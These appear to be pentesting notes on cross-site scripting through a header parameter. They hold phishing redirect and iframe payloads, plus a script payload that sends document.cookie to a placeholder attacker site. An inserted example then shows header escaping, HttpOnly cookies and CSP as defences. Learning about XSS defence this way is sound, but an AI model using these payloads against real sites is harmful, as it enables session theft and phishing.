XSS through header parameter
Vulnerability name: cross-site scripting
Vulnerability description: XSS is a type of injection in which malicious scripts are injected into otherwise benign and
trusted web sites. XSS attacks occur when an attacker uses a web application to send code, generally
in the form of a browser-side script, to a different end user.
#=============================================================================
Exploitation of XSS: phishing
1. document.location.href="website"
2. Advanced phishing
<iframe src="website"></iframe>
<iframe src="website" height="100%" width="100%" ></iframe>
3. Cookie-stealing XSS
<script>alert(document.cookie)</script>
The previous payload shows the cookie in a popup.
<script>document.location.href="our_website"+document.cookie</script>
This gives the cookie of the client.
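Defensive counterpart to the payloads above, as an added example that is not part of the original notes: a page that reflects a request header, shown vulnerable and then with output encoding, plus a session cookie marked HttpOnly so document.cookie cannot read it and a CSP that refuses inline scripts and injected iframes. The function names, the choice of User-Agent as the reflected header, and the sample request are assumptions made for the example.

```javascript
// Added example, not from the original notes. All function names are hypothetical.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode untrusted text for element content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Header names are case-insensitive, so look them up that way.
function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === wanted) return Array.isArray(value) ? value.join(", ") : String(value);
  }
  return "";
}

// Vulnerable: the header value is concatenated into the markup as-is.
function renderVulnerable(headers) {
  return "<p>Your browser: " + getHeader(headers, "User-Agent") + "</p>";
}

// Hardened: same page, header value encoded before it reaches the markup.
function renderSafe(headers) {
  return "<p>Your browser: " + escapeHtml(getHeader(headers, "User-Agent")) + "</p>";
}

// Set-Cookie value for a session cookie. HttpOnly hides it from document.cookie,
// Secure keeps it on HTTPS, SameSite=Lax limits cross-site sends.
function sessionCookie(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error("invalid cookie name");
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer if encoding is missed somewhere: with no 'unsafe-inline',
// inline <script> does not run, and frame-src 'none' blocks injected iframes.
function securityHeaders() {
  return {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-src 'none'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Constructed request; the header value is the popup payload from the notes.
const sampleHeaders = { "user-agent": "<script>alert(document.cookie)</script>" };
console.log(renderVulnerable(sampleHeaders)); // script tag survives intact
console.log(renderSafe(sampleHeaders));       // rendered as inert text
console.log(sessionCookie("sid", "abc 123"));
```

escapeHtml covers element content and quoted attributes only; a value placed inside a script block, a URL, or an unquoted attribute needs the encoding for that context.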
#==============================================================================
XSS through file upload
#==========================================================================
Convert self-XSS to reflected XSS